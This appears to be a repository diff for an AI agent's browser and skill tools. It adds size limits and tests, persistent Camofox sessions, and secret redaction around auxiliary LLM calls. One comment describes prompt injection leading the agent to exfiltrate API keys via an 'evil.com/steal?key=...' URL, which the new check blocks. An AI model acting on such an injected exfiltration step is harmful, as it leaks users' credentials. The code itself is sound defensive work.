|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from tools.skill_manager_tool import (
|
||||
MAX_SKILL_CONTENT_CHARS,
|
||||
MAX_SKILL_FILE_BYTES,
|
||||
_validate_content_size,
|
||||
skill_manage,
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def isolate_skills(tmp_path, monkeypatch):
|
||||
"""Redirect SKILLS_DIR to a temp directory."""
|
||||
skills_dir = tmp_path / "skills"
|
||||
skills_dir.mkdir()
|
||||
monkeypatch.setattr("tools.skill_manager_tool.SKILLS_DIR", skills_dir)
|
||||
monkeypatch.setattr("tools.skills_tool.SKILLS_DIR", skills_dir)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
return skills_dir
|
||||
|
||||
|
||||
def _make_skill_content(body_chars: int) -> str:
|
||||
"""Generate valid SKILL.md content with a body of the given character count."""
|
||||
frontmatter = (
|
||||
"---\n"
|
||||
"name: test-skill\n"
|
||||
"description: A test skill\n"
|
||||
"---\n"
|
||||
)
|
||||
body = "# Test Skill\n\n" + ("x" * max(0, body_chars - 15))
|
||||
return frontmatter + body
|
||||
|
||||
|
||||
class TestValidateContentSize:
|
||||
"""Unit tests for _validate_content_size."""
|
||||
|
||||
def test_within_limit(self):
|
||||
assert _validate_content_size("a" * 1000) is None
|
||||
|
||||
def test_at_limit(self):
|
||||
assert _validate_content_size("a" * MAX_SKILL_CONTENT_CHARS) is None
|
||||
|
||||
def test_over_limit(self):
|
||||
err = _validate_content_size("a" * (MAX_SKILL_CONTENT_CHARS + 1))
|
||||
assert err is not None
|
||||
assert "100,001" in err
|
||||
assert "100,000" in err
|
||||
|
||||
def test_custom_label(self):
|
||||
err = _validate_content_size("a" * (MAX_SKILL_CONTENT_CHARS + 1), label="references/api.md")
|
||||
assert "references/api.md" in err
|
||||
|
||||
|
||||
class TestCreateSkillSizeLimit:
|
||||
"""create action rejects oversized content."""
|
||||
|
||||
def test_create_within_limit(self, isolate_skills):
|
||||
content = _make_skill_content(5000)
|
||||
result = json.loads(skill_manage(action="create", name="small-skill", content=content))
|
||||
assert result["success"] is True
|
||||
|
||||
def test_create_over_limit(self, isolate_skills):
|
||||
content = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 100)
|
||||
result = json.loads(skill_manage(action="create", name="huge-skill", content=content))
|
||||
assert result["success"] is False
|
||||
assert "100,000" in result["error"]
|
||||
|
||||
def test_create_at_limit(self, isolate_skills):
|
||||
# Content at exactly the limit should succeed
|
||||
frontmatter = "---\nname: edge-skill\ndescription: Edge case\n---\n# Edge\n\n"
|
||||
body_budget = MAX_SKILL_CONTENT_CHARS - len(frontmatter)
|
||||
content = frontmatter + ("x" * body_budget)
|
||||
assert len(content) == MAX_SKILL_CONTENT_CHARS
|
||||
result = json.loads(skill_manage(action="create", name="edge-skill", content=content))
|
||||
assert result["success"] is True
|
||||
|
||||
|
||||
class TestEditSkillSizeLimit:
|
||||
"""edit action rejects oversized content."""
|
||||
|
||||
def test_edit_over_limit(self, isolate_skills):
|
||||
# Create a small skill first
|
||||
small = _make_skill_content(1000)
|
||||
json.loads(skill_manage(action="create", name="grow-me", content=small))
|
||||
|
||||
# Try to edit it to be oversized
|
||||
big = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 100)
|
||||
# Fix the name in frontmatter
|
||||
big = big.replace("name: test-skill", "name: grow-me")
|
||||
result = json.loads(skill_manage(action="edit", name="grow-me", content=big))
|
||||
assert result["success"] is False
|
||||
assert "100,000" in result["error"]
|
||||
|
||||
|
||||
class TestPatchSkillSizeLimit:
|
||||
"""patch action checks resulting size, not just the new_string."""
|
||||
|
||||
def test_patch_that_would_exceed_limit(self, isolate_skills):
|
||||
# Create a skill near the limit
|
||||
near_limit = _make_skill_content(MAX_SKILL_CONTENT_CHARS - 50)
|
||||
json.loads(skill_manage(action="create", name="near-limit", content=near_limit))
|
||||
|
||||
# Patch that adds enough to go over
|
||||
result = json.loads(skill_manage(
|
||||
action="patch",
|
||||
name="near-limit",
|
||||
old_string="# Test Skill",
|
||||
new_string="# Test Skill\n" + ("y" * 200),
|
||||
))
|
||||
assert result["success"] is False
|
||||
assert "100,000" in result["error"]
|
||||
|
||||
def test_patch_that_reduces_size_on_oversized_skill(self, isolate_skills, tmp_path):
|
||||
"""Patches that shrink an already-oversized skill should succeed."""
|
||||
# Manually create an oversized skill (simulating hand-placed)
|
||||
skill_dir = tmp_path / "skills" / "bloated"
|
||||
skill_dir.mkdir(parents=True)
|
||||
oversized = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 5000)
|
||||
oversized = oversized.replace("name: test-skill", "name: bloated")
|
||||
(skill_dir / "SKILL.md").write_text(oversized, encoding="utf-8")
|
||||
assert len(oversized) > MAX_SKILL_CONTENT_CHARS
|
||||
|
||||
# Patch that removes content to bring it under the limit.
|
||||
# Use replace_all to replace the repeated x's with a shorter string.
|
||||
result = json.loads(skill_manage(
|
||||
action="patch",
|
||||
name="bloated",
|
||||
old_string="x" * 100,
|
||||
new_string="y",
|
||||
replace_all=True,
|
||||
))
|
||||
# Should succeed because the result is well within limits
|
||||
assert result["success"] is True
|
||||
|
||||
def test_patch_supporting_file_size_limit(self, isolate_skills):
|
||||
"""Patch on a supporting file also checks size."""
|
||||
small = _make_skill_content(1000)
|
||||
json.loads(skill_manage(action="create", name="with-ref", content=small))
|
||||
# Create a supporting file
|
||||
json.loads(skill_manage(
|
||||
action="write_file",
|
||||
name="with-ref",
|
||||
file_path="references/data.md",
|
||||
file_content="# Data\n\nSmall content.",
|
||||
))
|
||||
# Try to patch it to be oversized
|
||||
result = json.loads(skill_manage(
|
||||
action="patch",
|
||||
name="with-ref",
|
||||
old_string="Small content.",
|
||||
new_string="x" * (MAX_SKILL_CONTENT_CHARS + 100),
|
||||
file_path="references/data.md",
|
||||
))
|
||||
assert result["success"] is False
|
||||
assert "references/data.md" in result["error"]
|
||||
|
||||
|
||||
class TestWriteFileSizeLimit:
|
||||
"""write_file action enforces both char and byte limits."""
|
||||
|
||||
def test_write_file_over_char_limit(self, isolate_skills):
|
||||
small = _make_skill_content(1000)
|
||||
json.loads(skill_manage(action="create", name="file-test", content=small))
|
||||
|
||||
result = json.loads(skill_manage(
|
||||
action="write_file",
|
||||
name="file-test",
|
||||
file_path="references/huge.md",
|
||||
file_content="x" * (MAX_SKILL_CONTENT_CHARS + 1),
|
||||
))
|
||||
assert result["success"] is False
|
||||
assert "100,000" in result["error"]
|
||||
|
||||
def test_write_file_within_limit(self, isolate_skills):
|
||||
small = _make_skill_content(1000)
|
||||
json.loads(skill_manage(action="create", name="file-ok", content=small))
|
||||
|
||||
result = json.loads(skill_manage(
|
||||
action="write_file",
|
||||
name="file-ok",
|
||||
file_path="references/normal.md",
|
||||
file_content="# Normal\n\n" + ("x" * 5000),
|
||||
))
|
||||
assert result["success"] is True
|
||||
|
||||
|
||||
class TestHandPlacedSkillsNoLimit:
|
||||
"""Skills dropped directly on disk are not constrained."""
|
||||
|
||||
def test_oversized_handplaced_skill_loads(self, isolate_skills, tmp_path):
|
||||
"""A hand-placed 200k skill can still be read via skill_view."""
|
||||
from tools.skills_tool import skill_view
|
||||
|
||||
skill_dir = tmp_path / "skills" / "manual-giant"
|
||||
skill_dir.mkdir(parents=True)
|
||||
huge = _make_skill_content(200_000)
|
||||
huge = huge.replace("name: test-skill", "name: manual-giant")
|
||||
(skill_dir / "SKILL.md").write_text(huge, encoding="utf-8")
|
||||
|
||||
result = json.loads(skill_view("manual-giant"))
|
||||
assert "content" in result
|
||||
# The full content is returned — no truncation at the storage layer
|
||||
assert len(result["content"]) > MAX_SKILL_CONTENT_CHARS
|
||||
@@ -34,6 +34,9 @@ from typing import Any, Dict, Optional
|
||||
|
||||
import requests
|
||||
|
||||
from hermes_cli.config import load_config
|
||||
from tools.browser_camofox_state import get_camofox_identity
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
@@ -42,6 +45,8 @@ logger = logging.getLogger(__name__)
|
||||
|
||||
_DEFAULT_TIMEOUT = 30 # seconds per HTTP request
|
||||
_SNAPSHOT_MAX_CHARS = 80_000 # camofox paginates at this limit
|
||||
_vnc_url: Optional[str] = None # cached from /health response
|
||||
_vnc_url_checked = False # only probe once per process
|
||||
|
||||
|
||||
def get_camofox_url() -> str:
|
||||
@@ -56,16 +61,52 @@ def is_camofox_mode() -> bool:
|
||||
|
||||
def check_camofox_available() -> bool:
|
||||
"""Verify the Camofox server is reachable."""
|
||||
global _vnc_url, _vnc_url_checked
|
||||
url = get_camofox_url()
|
||||
if not url:
|
||||
return False
|
||||
try:
|
||||
resp = requests.get(f"{url}/health", timeout=5)
|
||||
if resp.status_code == 200 and not _vnc_url_checked:
|
||||
try:
|
||||
data = resp.json()
|
||||
vnc_port = data.get("vncPort")
|
||||
if isinstance(vnc_port, int) and 1 <= vnc_port <= 65535:
|
||||
from urllib.parse import urlparse
|
||||
parsed = urlparse(url)
|
||||
host = parsed.hostname or "localhost"
|
||||
_vnc_url = f"http://{host}:{vnc_port}"
|
||||
except (ValueError, KeyError):
|
||||
pass
|
||||
_vnc_url_checked = True
|
||||
return resp.status_code == 200
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
|
||||
def get_vnc_url() -> Optional[str]:
|
||||
"""Return the VNC URL if the Camofox server exposes one, or None."""
|
||||
if not _vnc_url_checked:
|
||||
check_camofox_available()
|
||||
return _vnc_url
|
||||
|
||||
|
||||
def _managed_persistence_enabled() -> bool:
|
||||
"""Return whether Hermes-managed persistence is enabled for Camofox.
|
||||
|
||||
When enabled, sessions use a stable profile-scoped userId so the
|
||||
Camofox server can map it to a persistent browser profile directory.
|
||||
When disabled (default), each session gets a random userId (ephemeral).
|
||||
|
||||
Controlled by ``browser.camofox.managed_persistence`` in config.yaml.
|
||||
"""
|
||||
try:
|
||||
camofox_cfg = load_config().get("browser", {}).get("camofox", {})
|
||||
except Exception:
|
||||
return False
|
||||
return bool(camofox_cfg.get("managed_persistence"))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Session management
|
||||
# ---------------------------------------------------------------------------
|
||||
@@ -75,16 +116,31 @@ _sessions_lock = threading.Lock()
|
||||
|
||||
|
||||
def _get_session(task_id: Optional[str]) -> Dict[str, Any]:
|
||||
"""Get or create a camofox session for the given task."""
|
||||
"""Get or create a camofox session for the given task.
|
||||
|
||||
When managed persistence is enabled, uses a deterministic userId
|
||||
derived from the Hermes profile so the Camofox server can map it
|
||||
to the same persistent browser profile across restarts.
|
||||
"""
|
||||
task_id = task_id or "default"
|
||||
with _sessions_lock:
|
||||
if task_id in _sessions:
|
||||
return _sessions[task_id]
|
||||
session = {
|
||||
"user_id": f"hermes_{uuid.uuid4().hex[:10]}",
|
||||
"tab_id": None,
|
||||
"session_key": f"task_{task_id[:16]}",
|
||||
}
|
||||
if _managed_persistence_enabled():
|
||||
identity = get_camofox_identity(task_id)
|
||||
session = {
|
||||
"user_id": identity["user_id"],
|
||||
"tab_id": None,
|
||||
"session_key": identity["session_key"],
|
||||
"managed": True,
|
||||
}
|
||||
else:
|
||||
session = {
|
||||
"user_id": f"hermes_{uuid.uuid4().hex[:10]}",
|
||||
"tab_id": None,
|
||||
"session_key": f"task_{task_id[:16]}",
|
||||
"managed": False,
|
||||
}
|
||||
_sessions[task_id] = session
|
||||
return session
|
||||
|
||||
@@ -172,11 +228,19 @@ def camofox_navigate(url: str, task_id: Optional[str] = None) -> str:
|
||||
{"userId": session["user_id"], "url": url},
|
||||
timeout=60,
|
||||
)
|
||||
return json.dumps({
|
||||
result = {
|
||||
"success": True,
|
||||
"url": data.get("url", url),
|
||||
"title": data.get("title", ""),
|
||||
})
|
||||
}
|
||||
vnc = get_vnc_url()
|
||||
if vnc:
|
||||
result["vnc_url"] = vnc
|
||||
result["vnc_hint"] = (
|
||||
"Browser is visible via VNC. "
|
||||
"Share this link with the user so they can watch the browser live."
|
||||
)
|
||||
return json.dumps(result)
|
||||
except requests.HTTPError as e:
|
||||
return json.dumps({"success": False, "error": f"Navigation failed: {e}"})
|
||||
except requests.ConnectionError:
|
||||
@@ -421,6 +485,12 @@ def camofox_vision(question: str, annotate: bool = False,
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Redact secrets from annotation context before sending to vision LLM.
|
||||
# The screenshot image itself cannot be redacted, but at least the
|
||||
# text-based accessibility tree snippet won't leak secret values.
|
||||
from agent.redact import redact_sensitive_text
|
||||
annotation_context = redact_sensitive_text(annotation_context)
|
||||
|
||||
# Send to vision LLM
|
||||
from agent.auxiliary_client import call_llm
|
||||
|
||||
@@ -436,7 +506,7 @@ def camofox_vision(question: str, annotate: bool = False,
|
||||
except Exception:
|
||||
_vision_timeout = 120
|
||||
|
||||
analysis = call_llm(
|
||||
response = call_llm(
|
||||
messages=[{
|
||||
"role": "user",
|
||||
"content": [
|
||||
@@ -452,6 +522,11 @@ def camofox_vision(question: str, annotate: bool = False,
|
||||
task="vision",
|
||||
timeout=_vision_timeout,
|
||||
)
|
||||
analysis = (response.choices[0].message.content or "").strip() if response.choices else ""
|
||||
|
||||
# Redact secrets the vision LLM may have read from the screenshot.
|
||||
from agent.redact import redact_sensitive_text
|
||||
analysis = redact_sensitive_text(analysis)
|
||||
|
||||
return json.dumps({
|
||||
"success": True,
|
||||
|
||||
47
tools/browser_camofox_state.py
Normal file
47
tools/browser_camofox_state.py
Normal file
@@ -0,0 +1,47 @@
|
||||
"""Hermes-managed Camofox state helpers.
|
||||
|
||||
Provides profile-scoped identity and state directory paths for Camofox
|
||||
persistent browser profiles. When managed persistence is enabled, Hermes
|
||||
sends a deterministic userId derived from the active profile so that
|
||||
Camofox can map it to the same persistent browser profile directory
|
||||
across restarts.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import uuid
|
||||
from pathlib import Path
|
||||
from typing import Dict, Optional
|
||||
|
||||
from hermes_constants import get_hermes_home
|
||||
|
||||
CAMOFOX_STATE_DIR_NAME = "browser_auth"
|
||||
CAMOFOX_STATE_SUBDIR = "camofox"
|
||||
|
||||
|
||||
def get_camofox_state_dir() -> Path:
|
||||
"""Return the profile-scoped root directory for Camofox persistence."""
|
||||
return get_hermes_home() / CAMOFOX_STATE_DIR_NAME / CAMOFOX_STATE_SUBDIR
|
||||
|
||||
|
||||
def get_camofox_identity(task_id: Optional[str] = None) -> Dict[str, str]:
|
||||
"""Return the stable Hermes-managed Camofox identity for this profile.
|
||||
|
||||
The user identity is profile-scoped (same Hermes profile = same userId).
|
||||
The session key is scoped to the logical browser task so newly created
|
||||
tabs within the same profile reuse the same identity contract.
|
||||
"""
|
||||
scope_root = str(get_camofox_state_dir())
|
||||
logical_scope = task_id or "default"
|
||||
user_digest = uuid.uuid5(
|
||||
uuid.NAMESPACE_URL,
|
||||
f"camofox-user:{scope_root}",
|
||||
).hex[:10]
|
||||
session_digest = uuid.uuid5(
|
||||
uuid.NAMESPACE_URL,
|
||||
f"camofox-session:{scope_root}:{logical_scope}",
|
||||
).hex[:16]
|
||||
return {
|
||||
"user_id": f"hermes_{user_digest}",
|
||||
"session_key": f"task_{session_digest}",
|
||||
}
|
||||
@@ -1030,6 +1030,13 @@ def _extract_relevant_content(
|
||||
f"Provide a concise summary focused on interactive elements and key content."
|
||||
)
|
||||
|
||||
# Redact secrets from snapshot before sending to auxiliary LLM.
|
||||
# Without this, a page displaying env vars or API keys would leak
|
||||
# secrets to the extraction model before run_agent.py's general
|
||||
# redaction layer ever sees the tool result.
|
||||
from agent.redact import redact_sensitive_text
|
||||
extraction_prompt = redact_sensitive_text(extraction_prompt)
|
||||
|
||||
try:
|
||||
call_kwargs = {
|
||||
"task": "web_extract",
|
||||
@@ -1041,7 +1048,9 @@ def _extract_relevant_content(
|
||||
if model:
|
||||
call_kwargs["model"] = model
|
||||
response = call_llm(**call_kwargs)
|
||||
return (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
|
||||
extracted = (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
|
||||
# Redact any secrets the auxiliary LLM may have echoed back.
|
||||
return redact_sensitive_text(extracted)
|
||||
except Exception:
|
||||
return _truncate_snapshot(snapshot_text)
|
||||
|
||||
@@ -1078,6 +1087,17 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
|
||||
Returns:
|
||||
JSON string with navigation result (includes stealth features info on first nav)
|
||||
"""
|
||||
# Secret exfiltration protection — block URLs that embed API keys or
|
||||
# tokens in query parameters. A prompt injection could trick the agent
|
||||
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
|
||||
from agent.redact import _PREFIX_RE
|
||||
if _PREFIX_RE.search(url):
|
||||
return json.dumps({
|
||||
"success": False,
|
||||
"error": "Blocked: URL contains what appears to be an API key or token. "
|
||||
"Secrets must not be sent in URLs.",
|
||||
})
|
||||
|
||||
# SSRF protection — block private/internal addresses before navigating.
|
||||
# Skipped for local backends (Camofox, headless Chromium without a cloud
|
||||
# provider) because the agent already has full local network access via
|
||||
@@ -1722,6 +1742,9 @@ def browser_vision(question: str, annotate: bool = False, task_id: Optional[str]
|
||||
response = call_llm(**call_kwargs)
|
||||
|
||||
analysis = (response.choices[0].message.content or "").strip()
|
||||
# Redact secrets the vision LLM may have read from the screenshot.
|
||||
from agent.redact import redact_sensitive_text
|
||||
analysis = redact_sensitive_text(analysis)
|
||||
response_data = {
|
||||
"success": True,
|
||||
"analysis": analysis or "Vision analysis returned no content.",
|
||||
|
||||
@@ -82,6 +82,8 @@ SKILLS_DIR = HERMES_HOME / "skills"
|
||||
|
||||
MAX_NAME_LENGTH = 64
|
||||
MAX_DESCRIPTION_LENGTH = 1024
|
||||
MAX_SKILL_CONTENT_CHARS = 100_000 # ~36k tokens at 2.75 chars/token
|
||||
MAX_SKILL_FILE_BYTES = 1_048_576 # 1 MiB per supporting file
|
||||
|
||||
# Characters allowed in skill names (filesystem-safe, URL-friendly)
|
||||
VALID_NAME_RE = re.compile(r'^[a-z0-9][a-z0-9._-]*$')
|
||||
@@ -177,6 +179,21 @@ def _validate_frontmatter(content: str) -> Optional[str]:
|
||||
return None
|
||||
|
||||
|
||||
def _validate_content_size(content: str, label: str = "SKILL.md") -> Optional[str]:
|
||||
"""Check that content doesn't exceed the character limit for agent writes.
|
||||
|
||||
Returns an error message or None if within bounds.
|
||||
"""
|
||||
if len(content) > MAX_SKILL_CONTENT_CHARS:
|
||||
return (
|
||||
f"{label} content is {len(content):,} characters "
|
||||
f"(limit: {MAX_SKILL_CONTENT_CHARS:,}). "
|
||||
f"Consider splitting into a smaller SKILL.md with supporting files "
|
||||
f"in references/ or templates/."
|
||||
)
|
||||
return None
|
||||
|
||||
|
||||
def _resolve_skill_dir(name: str, category: str = None) -> Path:
|
||||
"""Build the directory path for a new skill, optionally under a category."""
|
||||
if category:
|
||||
@@ -275,6 +292,10 @@ def _create_skill(name: str, content: str, category: str = None) -> Dict[str, An
|
||||
if err:
|
||||
return {"success": False, "error": err}
|
||||
|
||||
err = _validate_content_size(content)
|
||||
if err:
|
||||
return {"success": False, "error": err}
|
||||
|
||||
# Check for name collisions across all directories
|
||||
existing = _find_skill(name)
|
||||
if existing:
|
||||
@@ -318,6 +339,10 @@ def _edit_skill(name: str, content: str) -> Dict[str, Any]:
|
||||
if err:
|
||||
return {"success": False, "error": err}
|
||||
|
||||
err = _validate_content_size(content)
|
||||
if err:
|
||||
return {"success": False, "error": err}
|
||||
|
||||
existing = _find_skill(name)
|
||||
if not existing:
|
||||
return {"success": False, "error": f"Skill '{name}' not found. Use skills_list() to see available skills."}
|
||||
@@ -379,27 +404,29 @@ def _patch_skill(
|
||||
|
||||
content = target.read_text(encoding="utf-8")
|
||||
|
||||
count = content.count(old_string)
|
||||
if count == 0:
|
||||
# Use the same fuzzy matching engine as the file patch tool.
|
||||
# This handles whitespace normalization, indentation differences,
|
||||
# escape sequences, and block-anchor matching — saving the agent
|
||||
# from exact-match failures on minor formatting mismatches.
|
||||
from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
|
||||
new_content, match_count, match_error = fuzzy_find_and_replace(
|
||||
content, old_string, new_string, replace_all
|
||||
)
|
||||
if match_error:
|
||||
# Show a short preview of the file so the model can self-correct
|
||||
preview = content[:500] + ("..." if len(content) > 500 else "")
|
||||
return {
|
||||
"success": False,
|
||||
"error": "old_string not found in the file.",
|
||||
"error": match_error,
|
||||
"file_preview": preview,
|
||||
}
|
||||
|
||||
if count > 1 and not replace_all:
|
||||
return {
|
||||
"success": False,
|
||||
"error": (
|
||||
f"old_string matched {count} times. Provide more surrounding context "
|
||||
f"to make the match unique, or set replace_all=true to replace all occurrences."
|
||||
),
|
||||
"match_count": count,
|
||||
}
|
||||
|
||||
new_content = content.replace(old_string, new_string) if replace_all else content.replace(old_string, new_string, 1)
|
||||
# Check size limit on the result
|
||||
target_label = "SKILL.md" if not file_path else file_path
|
||||
err = _validate_content_size(new_content, label=target_label)
|
||||
if err:
|
||||
return {"success": False, "error": err}
|
||||
|
||||
# If patching SKILL.md, validate frontmatter is still intact
|
||||
if not file_path:
|
||||
@@ -419,10 +446,9 @@ def _patch_skill(
|
||||
_atomic_write_text(target, original_content)
|
||||
return {"success": False, "error": scan_error}
|
||||
|
||||
replacements = count if replace_all else 1
|
||||
return {
|
||||
"success": True,
|
||||
"message": f"Patched {'SKILL.md' if not file_path else file_path} in skill '{name}' ({replacements} replacement{'s' if replacements > 1 else ''}).",
|
||||
"message": f"Patched {'SKILL.md' if not file_path else file_path} in skill '{name}' ({match_count} replacement{'s' if match_count > 1 else ''}).",
|
||||
}
|
||||
|
||||
|
||||
@@ -455,6 +481,21 @@ def _write_file(name: str, file_path: str, file_content: str) -> Dict[str, Any]:
|
||||
if not file_content and file_content != "":
|
||||
return {"success": False, "error": "file_content is required."}
|
||||
|
||||
# Check size limits
|
||||
content_bytes = len(file_content.encode("utf-8"))
|
||||
if content_bytes > MAX_SKILL_FILE_BYTES:
|
||||
return {
|
||||
"success": False,
|
||||
"error": (
|
||||
f"File content is {content_bytes:,} bytes "
|
||||
f"(limit: {MAX_SKILL_FILE_BYTES:,} bytes / 1 MiB). "
|
||||
f"Consider splitting into smaller files."
|
||||
),
|
||||
}
|
||||
err = _validate_content_size(file_content, label=file_path)
|
||||
if err:
|
||||
return {"success": False, "error": err}
|
||||
|
||||
existing = _find_skill(name)
|
||||
if not existing:
|
||||
return {"success": False, "error": f"Skill '{name}' not found. Create it first with action='create'."}
|
||||
|
||||
@@ -2525,6 +2525,22 @@ def install_from_quarantine(
|
||||
if install_dir.exists():
|
||||
shutil.rmtree(install_dir)
|
||||
|
||||
# Warn (but don't block) if SKILL.md is very large
|
||||
skill_md = quarantine_path / "SKILL.md"
|
||||
if skill_md.exists():
|
||||
try:
|
||||
skill_size = skill_md.stat().st_size
|
||||
if skill_size > 100_000:
|
||||
logger.warning(
|
||||
"Skill '%s' has a large SKILL.md (%s chars). "
|
||||
"Large skills consume significant context when loaded. "
|
||||
"Consider asking the author to split it into smaller files.",
|
||||
safe_skill_name,
|
||||
f"{skill_size:,}",
|
||||
)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
install_dir.parent.mkdir(parents=True, exist_ok=True)
|
||||
shutil.move(str(quarantine_path), str(install_dir))
|
||||
|
||||
|
||||
@@ -925,24 +925,26 @@ def web_search_tool(query: str, limit: int = 5) -> str:
|
||||
|
||||
|
||||
async def web_extract_tool(
|
||||
urls: List[str],
|
||||
format: str = None,
|
||||
urls: List[str],
|
||||
format: str = None,
|
||||
use_llm_processing: bool = True,
|
||||
model: str = DEFAULT_SUMMARIZER_MODEL,
|
||||
min_length: int = DEFAULT_MIN_LENGTH_FOR_SUMMARIZATION
|
||||
) -> str:
|
||||
"""
|
||||
Extract content from specific web pages using available extraction API backend.
|
||||
|
||||
|
||||
This function provides a generic interface for web content extraction that
|
||||
can work with multiple backends. Currently uses Firecrawl.
|
||||
|
||||
|
||||
Args:
|
||||
urls (List[str]): List of URLs to extract content from
|
||||
format (str): Desired output format ("markdown" or "html", optional)
|
||||
use_llm_processing (bool): Whether to process content with LLM for summarization (default: True)
|
||||
model (str): The model to use for LLM processing (default: google/gemini-3-flash-preview)
|
||||
min_length (int): Minimum content length to trigger LLM processing (default: 5000)
|
||||
|
||||
Security: URLs are checked for embedded secrets before fetching.
|
||||
|
||||
Returns:
|
||||
str: JSON string containing extracted content. If LLM processing is enabled and successful,
|
||||
@@ -951,6 +953,16 @@ async def web_extract_tool(
|
||||
Raises:
|
||||
Exception: If extraction fails or API key is not set
|
||||
"""
|
||||
# Block URLs containing embedded secrets (exfiltration prevention)
|
||||
from agent.redact import _PREFIX_RE
|
||||
for _url in urls:
|
||||
if _PREFIX_RE.search(_url):
|
||||
return json.dumps({
|
||||
"success": False,
|
||||
"error": "Blocked: URL contains what appears to be an API key or token. "
|
||||
"Secrets must not be sent in URLs.",
|
||||
})
|
||||
|
||||
debug_call_data = {
|
||||
"parameters": {
|
||||
"urls": urls,
|
||||
|
||||
@@ -85,6 +85,7 @@ For native Anthropic auth, Hermes prefers Claude Code's own credential files whe
|
||||
| `BROWSERBASE_PROJECT_ID` | Browserbase project ID |
|
||||
| `BROWSER_USE_API_KEY` | Browser Use cloud browser API key ([browser-use.com](https://browser-use.com/)) |
|
||||
| `BROWSER_CDP_URL` | Chrome DevTools Protocol URL for local browser (set via `/browser connect`, e.g. `ws://localhost:9222`) |
|
||||
| `CAMOFOX_URL` | Camofox local anti-detection browser URL (default: `http://localhost:9377`) |
|
||||
| `BROWSER_INACTIVITY_TIMEOUT` | Browser session inactivity timeout in seconds |
|
||||
| `FAL_KEY` | Image generation ([fal.ai](https://fal.ai/)) |
|
||||
| `GROQ_API_KEY` | Groq Whisper STT API key ([groq.com](https://groq.com/)) |
|
||||
|
||||
@@ -1016,6 +1016,8 @@ browser:
|
||||
inactivity_timeout: 120 # Seconds before auto-closing idle sessions
|
||||
command_timeout: 30 # Timeout in seconds for browser commands (screenshot, navigate, etc.)
|
||||
record_sessions: false # Auto-record browser sessions as WebM videos to ~/.hermes/browser_recordings/
|
||||
camofox:
|
||||
managed_persistence: false # When true, Camofox sessions persist cookies/logins across restarts
|
||||
```
|
||||
|
||||
The browser toolset supports multiple providers. See the [Browser feature page](/docs/user-guide/features/browser) for details on Browserbase, Browser Use, and local Chrome CDP setup.
|
||||
|
||||
@@ -11,6 +11,7 @@ Hermes Agent includes a full browser automation toolset with multiple backend op
|
||||
|
||||
- **Browserbase cloud mode** via [Browserbase](https://browserbase.com) for managed cloud browsers and anti-bot tooling
|
||||
- **Browser Use cloud mode** via [Browser Use](https://browser-use.com) as an alternative cloud browser provider
|
||||
- **Camofox local mode** via [Camofox](https://github.com/jo-inc/camofox-browser) for local anti-detection browsing (Firefox-based fingerprint spoofing)
|
||||
- **Local Chrome via CDP** — connect browser tools to your own Chrome instance using `/browser connect`
|
||||
- **Local browser mode** via the `agent-browser` CLI and a local Chromium installation
|
||||
|
||||
@@ -54,6 +55,50 @@ BROWSER_USE_API_KEY=***
|
||||
|
||||
Get your API key at [browser-use.com](https://browser-use.com). Browser Use provides a cloud browser via its REST API. If both Browserbase and Browser Use credentials are set, Browserbase takes priority.
|
||||
|
||||
### Camofox local mode
|
||||
|
||||
[Camofox](https://github.com/jo-inc/camofox-browser) is a self-hosted Node.js server wrapping Camoufox (a Firefox fork with C++ fingerprint spoofing). It provides local anti-detection browsing without cloud dependencies.
|
||||
|
||||
```bash
|
||||
# Install and run
|
||||
git clone https://github.com/jo-inc/camofox-browser && cd camofox-browser
|
||||
npm install && npm start # downloads Camoufox (~300MB) on first run
|
||||
|
||||
# Or via Docker
|
||||
docker run -d --network host -e CAMOFOX_PORT=9377 jo-inc/camofox-browser
|
||||
```
|
||||
|
||||
Then set in `~/.hermes/.env`:
|
||||
|
||||
```bash
|
||||
CAMOFOX_URL=http://localhost:9377
|
||||
```
|
||||
|
||||
Or configure via `hermes tools` → Browser Automation → Camofox.
|
||||
|
||||
When `CAMOFOX_URL` is set, all browser tools automatically route through Camofox instead of Browserbase or agent-browser.
|
||||
|
||||
#### Persistent browser sessions
|
||||
|
||||
By default, each Camofox session gets a random identity — cookies and logins don't survive across agent restarts. To enable persistent browser sessions:
|
||||
|
||||
```yaml
|
||||
# In ~/.hermes/config.yaml
|
||||
browser:
|
||||
camofox:
|
||||
managed_persistence: true
|
||||
```
|
||||
|
||||
When enabled, Hermes sends a stable profile-scoped identity to Camofox. The Camofox server maps this identity to a persistent browser profile directory, so cookies, logins, and localStorage survive across restarts. Different Hermes profiles get different browser profiles (profile isolation).
|
||||
|
||||
:::note
|
||||
The Camofox server must also be configured with `CAMOFOX_PROFILE_DIR` on the server side for persistence to work.
|
||||
:::
|
||||
|
||||
#### VNC live view
|
||||
|
||||
When Camofox runs in headed mode (with a visible browser window), it exposes a VNC port in its health check response. Hermes automatically discovers this and includes the VNC URL in navigation responses, so the agent can share a link for you to watch the browser live.
|
||||
|
||||
### Local Chrome via CDP (`/browser connect`)
|
||||
|
||||
Instead of a cloud provider, you can attach Hermes browser tools to your own running Chrome instance via the Chrome DevTools Protocol (CDP). This is useful when you want to see what the agent is doing in real-time, interact with pages that require your own cookies/sessions, or avoid cloud browser costs.
|
||||
|
||||
Reference in New Issue
Block a user